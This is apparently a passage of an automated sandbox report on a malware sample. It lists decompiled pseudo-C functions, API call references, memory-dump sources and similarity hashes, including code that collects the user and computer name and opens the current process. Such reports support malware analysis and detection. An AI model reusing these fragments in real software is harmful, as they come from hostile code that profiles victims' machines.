					}
					E02EAA734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02EAA749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2ead33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02ea853f
0x02ea8548
0x02ea854f
0x02ea8554
0x02ea85c1
0x02ea85c7
0x02ea85cc
0x02ea85d3
0x02ea85d8
0x02ea85dd
0x02ea8748
0x02ea874f
0x02ea874f
0x02ea8754
0x02ea8756
0x02ea8756
0x02ea875f
0x02ea875f
0x02ea85e3
0x02ea85ef
0x02ea873e
0x02ea8741
0x00000000
0x02ea8741
0x02ea85f5
0x02ea85fa
0x02ea85fd
0x02ea8602
0x02ea8607
0x02ea8650
0x02ea8650
0x02ea8663
0x02ea866d
0x02ea8673
0x02ea867a
0x02ea8684
0x02ea8684
0x02ea867c
0x02ea867c
0x02ea867c
0x02ea867c
0x02ea86a6
0x02ea86ae
0x02ea86dc
0x02ea86e1
0x02ea86e8
0x02ea86ed
0x02ea86f1
0x02ea8723
0x02ea86f3
0x02ea8700
0x02ea8703
0x02ea8713
0x02ea8716
0x02ea871c
0x02ea871c
0x02ea86b0
0x02ea86bd
0x02ea86c0
0x02ea86d2
0x02ea86d5
0x02ea86d5
0x02ea872d
0x02ea8739
0x02ea872f
0x02ea8732
0x02ea8732
0x02ea872d
0x02ea86a6
0x00000000
0x02ea866d
0x02ea8616
0x02ea8619
0x02ea8620
0x02ea8626
0x02ea8629
0x02ea862b
0x02ea8637
0x02ea863a
0x02ea863a
0x02ea8640
0x02ea8645
0x02ea8645
0x02ea864b
0x00000000
0x02ea864b
0x02ea8559
0x00000000
0x02ea8580
0x02ea8580
0x02ea858c
0x02ea859f
0x02ea85a5
0x02ea85ad
0x00000000
0x02ea85ad

APIs

StrChrA.SHLWAPI(02EA3741,0000005F,00000000,00000000,00000104), ref: 02EA8572
lstrcpy.KERNEL32(?,?), ref: 02EA859F

Part of subcall function 02EA9070: lstrlen.KERNEL32(?,00000000,039C9A98,00000000,02EA8808,039C9C76,?,?,?,?,?,63699BC3,00000005,02EAD00C), ref: 02EA9077
Part of subcall function 02EA9070: mbstowcs.NTDLL ref: 02EA90A0
Part of subcall function 02EA9070: memset.NTDLL ref: 02EA90B2

Part of subcall function 02EA5D7D: lstrlenW.KERNEL32(?,?,?,02EA8708,3D02EAC0,80000002,02EA3741,02EAA513,74666F53,4D4C4B48,02EAA513,?,3D02EAC0,80000002,02EA3741,?), ref: 02EA5DA2

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

lstrcpy.KERNEL32(?,00000000), ref: 02EA85C1

Strings

\, xrefs: 02EA85A5
(, xrefs: 02EA8622

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: ab2bbb548ce0d3ea2e1b1674681c656edb9110042af375e15631dff792f2735a
Instruction ID: 2755a6fc8f1c7318aefb6d3621ba91dc5c372d5c1d220d393ee53cbbc129fc0d
Opcode Fuzzy Hash: ab2bbb548ce0d3ea2e1b1674681c656edb9110042af375e15631dff792f2735a
Instruction Fuzzy Hash: 1A514976580209AFDF11EF60DDA0E9A7BBAEB04348F40D518F9159A120D735F965DF20

Uniqueness

Uniqueness Score: -1.00%

Function 02EAA199, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EAA199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02EAA71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02EAA734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2ea1fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02eaa1a7
0x02eaa1aa
0x02eaa1ad
0x02eaa1b3
0x02eaa1b8
0x02eaa1be
0x02eaa1c6
0x02eaa1c9
0x02eaa1cf
0x02eaa1d4
0x02eaa1e1
0x02eaa1ee
0x02eaa1f2
0x02eaa1f4
0x02eaa1f8
0x02eaa1fb
0x02eaa20b
0x02eaa25e
0x02eaa25f
0x02eaa20d
0x02eaa212
0x02eaa213
0x02eaa218
0x02eaa21b
0x02eaa22e
0x00000000
0x02eaa230
0x02eaa233
0x02eaa238
0x02eaa246
0x02eaa249
0x02eaa24f
0x02eaa254
0x00000000
0x02eaa256
0x02eaa256
0x02eaa259
0x02eaa259
0x02eaa254
0x02eaa22e
0x02eaa264
0x02eaa265
0x02eaa1d4
0x02eaa26b

APIs

GetUserNameW.ADVAPI32(00000000,02EA1FD2), ref: 02EAA1AD
GetComputerNameW.KERNEL32(00000000,02EA1FD2), ref: 02EAA1C9

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

GetUserNameW.ADVAPI32(00000000,02EA1FD2), ref: 02EAA203
GetComputerNameW.KERNEL32(02EA1FD2,?), ref: 02EAA226
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02EA1FD2,00000000,02EA1FD4,00000000,00000000,?,?,02EA1FD2), ref: 02EAA249

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 8f3308c0eb6e459b946ef7d275fb2955c184fc51a3c0161a7275d8d5851ba851
Instruction ID: 1ba8cc7ae10c0d5e265b7ac5a434e85ad3e2aace4ed53382b772f470d689712f
Opcode Fuzzy Hash: 8f3308c0eb6e459b946ef7d275fb2955c184fc51a3c0161a7275d8d5851ba851
Instruction Fuzzy Hash: 5C212976941208FFDB10DFE5C9958EEBBB8EF44308B6084AAE505E7200E730AB54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1F70, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction ID: ccea0a8057b824492fa47db9ff6d2e4a4bde780ed4dc4b1144d1ef4d6f43785d
Opcode Fuzzy Hash: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction Fuzzy Hash: B8311CB1D10109DFCB04CFE4D850BEEB7B5FB59714F108A1AE425A7390DB345989EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFCD0, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFCFA
int.LIBCPMTD ref: 6E1CFD13

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction ID: bab263128bf03b5b9a7bf6c962b692163821b0dd6801522b288fdf473b04f104
Opcode Fuzzy Hash: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction Fuzzy Hash: B1314DB1D00149DFCB04CFE4D840BEEB7B5FB58718F108A1AE425A7380DB385A85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDF38, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1DDF44

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__amsg_exit.LIBCMT ref: 6E1DDF64
__lock.LIBCMT ref: 6E1DDF74
InterlockedDecrement.KERNEL32(?), ref: 6E1DDF91
InterlockedIncrement.KERNEL32(6E203218), ref: 6E1DDFBC

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction ID: de6c65fc89f4aaa300a8de46f1e1d2af3e81907594e21641e1e1875de4f53395
Opcode Fuzzy Hash: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction Fuzzy Hash: 22018472904A16EBDB61EFE48454BCEB374BF15719F214606E810A7284C73469CAEFE1

Uniqueness

Uniqueness Score: -1.00%

Function 02EA3DE9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02EA3DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02EA5AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02EAA81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2ead128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02ea3de9
0x02ea3df6
0x02ea3df8
0x02ea3e5b
0x00000000
0x02ea3e5b
0x02ea3e10
0x02ea3e17
0x02ea3e23
0x02ea3e28
0x02ea3e2a
0x02ea3e2c
0x02ea3e2e
0x02ea3e30
0x02ea3e32
0x02ea3e3e
0x02ea3e4e
0x00000000
0x02ea3e40
0x02ea3e40
0x02ea3e47
0x02ea3e54
0x02ea3e54
0x02ea3e54
0x02ea3e47
0x02ea3e3e
0x02ea3e59
0x00000000
0x00000000
0x02ea3e5f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02EA67B8,?,?,00000000,00000000), ref: 02EA3E23
ResetEvent.KERNEL32(?), ref: 02EA3E28
GetLastError.KERNEL32 ref: 02EA3E40
GetLastError.KERNEL32(?,?,00000102,02EA67B8,?,?,00000000,00000000), ref: 02EA3E5B

Part of subcall function 02EA5AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02EA3E08,?,?,?,?,00000102,02EA67B8,?,?,00000000), ref: 02EA5AFD
Part of subcall function 02EA5AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02EA3E08,?,?,?,?,00000102,02EA67B8,?), ref: 02EA5B5B
Part of subcall function 02EA5AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 02EA5B6B

SetEvent.KERNEL32(?), ref: 02EA3E4E

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 9ae4d3af3cfb82b5cafd0a3018232b5196890e15dc56c82983db64bbca2b0d12
Instruction ID: f655872ef34b042bda14694f64005f77d5a58e3c7945967e2e246f673423b9a0
Opcode Fuzzy Hash: 9ae4d3af3cfb82b5cafd0a3018232b5196890e15dc56c82983db64bbca2b0d12
Instruction Fuzzy Hash: 3201AD311C0301ABDA306B31DC95F5BBBA8EF48B68F20EB25F552D90E0C721F854DA60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7128, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6E1D7146

Part of subcall function 6E1DC0BA: __mtinitlocknum.LIBCMT ref: 6E1DC0D0
Part of subcall function 6E1DC0BA: __amsg_exit.LIBCMT ref: 6E1DC0DC
Part of subcall function 6E1DC0BA: RtlEnterCriticalSection.NTDLL(?), ref: 6E1DC0E4

___sbh_find_block.LIBCMT ref: 6E1D7151
___sbh_free_block.LIBCMT ref: 6E1D7160
HeapFree.KERNEL32(00000000,6E1CC9C7,6E2009A0,0000000C,6E1DC09B,00000000,6E200CD8,0000000C,6E1DC0D5,6E1CC9C7,?,?,6E1E42CF,00000004,6E200F18,0000000C), ref: 6E1D7190
GetLastError.KERNEL32(?,6E1E42CF,00000004,6E200F18,0000000C,6E1D9A60,6E1CC9C7,?,00000000,00000000,00000000,?,6E1DAE78,00000001,00000214), ref: 6E1D71A1

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction ID: f9d175c56f9ab3eef83f1b6ab816cf69f5020d254cf8306f4dc02deeb54fbb4f
Opcode Fuzzy Hash: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction Fuzzy Hash: B2016771805716EBDF21AFF19809BDE3668AF02765F204A06E414AA1C4CB3895C8FEA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EA3E69, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA3E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2ead26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2ead25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2ead258 = _t6;
					 *0x2ead264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2ead254 = _t7;
					if(_t7 == 0) {
						 *0x2ead254 =  *0x2ead254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02ea3e71
0x02ea3e77
0x02ea3e7e
0x00000000
0x02ea3ed8
0x02ea3e80
0x02ea3e88
0x02ea3e95
0x02ea3e95
0x02ea3ed5
0x00000000
0x02ea3ed5
0x02ea3e97
0x02ea3e97
0x02ea3e9c
0x02ea3eae
0x02ea3eb3
0x02ea3eb9
0x02ea3ebf
0x02ea3ec6
0x02ea3ec8
0x02ea3ec8
0x00000000
0x02ea3ecf
0x02ea3e91
0x00000000
0x00000000
0x02ea3e93
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02EA131F,?,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA3E71
GetVersion.KERNEL32(?,00000001,?,?,?,02EA4EF2,?), ref: 02EA3E80
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02EA4EF2,?), ref: 02EA3E9C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA3EB9
GetLastError.KERNEL32(?,00000001,?,?,?,02EA4EF2,?), ref: 02EA3ED8

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 4279b781a944533aa1cc08bbbb226905daba7cedee90c7058f3e2fce832febd9
Instruction ID: 60c31396ad95432f764cb9064b801e4b9ee6575df7c96bd4a82f6e3532d6416f
Opcode Fuzzy Hash: 4279b781a944533aa1cc08bbbb226905daba7cedee90c7058f3e2fce832febd9
Instruction Fuzzy Hash: 34F0C870EC03019BD7208F369D2AB157B51AB80745F90EC56E506CA1C0E774F0E1CB24

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0930, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0B10

Strings

$, xrefs: 6E1D0994
l, xrefs: 6E1D0949
$, xrefs: 6E1D098E

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction ID: 492511245ebe254a7002a083bc2b85a16b184c9dd2ee9e70f2fdb1dfabd7f368
Opcode Fuzzy Hash: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction Fuzzy Hash: 73618D7090060DDFDF04CF94D954BDEBBB9FF85300F008188E599A2281EB789AA9DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0B70, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0D39

Strings

$, xrefs: 6E1D0BCE
$, xrefs: 6E1D0BD4
l, xrefs: 6E1D0B89

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction ID: e8f4bc2df14076b5fcd6d870665b7f11dfdaf01eba6886853da5e6df6e990ac2
Opcode Fuzzy Hash: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction Fuzzy Hash: BD518A7090460DDFDB14CF94D954BEEBBB9FF49304F4080C9E898A2280DB389AA8DF55

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5373, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6E1D5385
___removelocaleref.LIBCMT ref: 6E1D5390
___freetlocinfo.LIBCMT ref: 6E1D53A4

Part of subcall function 6E1D50DC: ___free_lconv_mon.LIBCMT ref: 6E1D5122
Part of subcall function 6E1D50DC: ___free_lconv_num.LIBCMT ref: 6E1D5143
Part of subcall function 6E1D50DC: ___free_lc_time.LIBCMT ref: 6E1D51C8

Strings

8, n, xrefs: 6E1D539B

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: 8, n
API String ID: 4212647719-436394027
Opcode ID: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction ID: 911413bb0842dad2cc0b7a207cff4fd2fe98fd411f03afb68dae07f87718ae34
Opcode Fuzzy Hash: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction Fuzzy Hash: 58E0DF23905C22E9C69115DCA4503AF63A9DFA2711B32040AE860AB048DBA0CCCC7190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0460, Relevance: 6.2, APIs: 4, Instructions: 188COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D04E2
numpunct.LIBCPMTD ref: 6E1D053F

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: numpunctstd::ios_base::getloc
String ID:
API String ID: 1901892925-0
Opcode ID: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction ID: c21d47d5ae941d74f5e4d546c88061d539d344908803ea8327f1dff19b171ecd
Opcode Fuzzy Hash: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction Fuzzy Hash: 9A8160B19001589FCB04CFA8C951BEEBBB9BF58304F108598F519E7290DB34AE84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6F3A, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02EA6F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2ead2a8; // 0xb1a5a8
					_t5 = _t103 + 0x2eae038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2eac290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2ead2a8; // 0xb1a5a8
												_t28 = _t109 + 0x2eae0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2ead2a8; // 0xb1a5a8
														_t33 = _t79 + 0x2eae078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02ea6f3f
0x02ea6f48
0x02ea6f49
0x02ea6f4d
0x02ea6f53
0x02ea6f59
0x02ea6f62
0x02ea6f68
0x02ea6f72
0x02ea6f74
0x02ea6f7a
0x02ea6f7f
0x02ea6f8a
0x02ea6f90
0x02ea6f95
0x02ea70b7
0x02ea6f9b
0x02ea6f9b
0x02ea6fa8
0x02ea6fae
0x02ea6fb4
0x02ea6fb8
0x02ea6fbe
0x02ea6fcb
0x02ea6fcf
0x02ea6fd5
0x02ea6fd8
0x02ea6fe0
0x02ea6fe1
0x02ea6fe5
0x02ea6fe9
0x02ea6fec
0x02ea6fef
0x02ea6ff5
0x02ea6ffe
0x02ea7004
0x02ea7005
0x02ea7008
0x02ea7009
0x02ea700a
0x02ea7012
0x02ea7013
0x02ea7014
0x02ea7016
0x02ea701a
0x02ea701e
0x00000000
0x00000000
0x02ea7024
0x02ea702d
0x02ea7033
0x02ea703d
0x02ea7041
0x02ea7043
0x02ea7050
0x02ea7054
0x02ea705c
0x02ea7061
0x02ea7073
0x02ea7075
0x02ea707b
0x02ea707b
0x02ea7084
0x02ea7084
0x02ea7086
0x02ea708c
0x02ea708c
0x02ea708f
0x02ea7095
0x02ea7098
0x02ea70a1
0x00000000
0x00000000
0x00000000
0x02ea70a1
0x02ea6ff5
0x02ea6fef
0x02ea6fd8
0x02ea70a7
0x02ea70a7
0x02ea70ad
0x02ea70ad
0x02ea70b3
0x02ea70b3
0x02ea70bc
0x02ea70c2
0x02ea70c2
0x02ea6f7f
0x02ea70cb

APIs

SysAllocString.OLEAUT32(02EAC290), ref: 02EA6F8A
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02EA706B
SysFreeString.OLEAUT32(00000000), ref: 02EA7084
SysFreeString.OLEAUT32(?), ref: 02EA70B3

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 28b63bd61ad2279dbb2f3167eb8987389bb7a11fd95fe71afc4681a23947364d
